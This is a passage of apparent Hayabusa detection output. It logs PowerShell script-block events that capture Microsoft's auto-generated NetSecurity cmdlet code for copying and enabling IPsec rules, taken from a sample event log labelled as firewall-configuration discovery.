$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewal",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 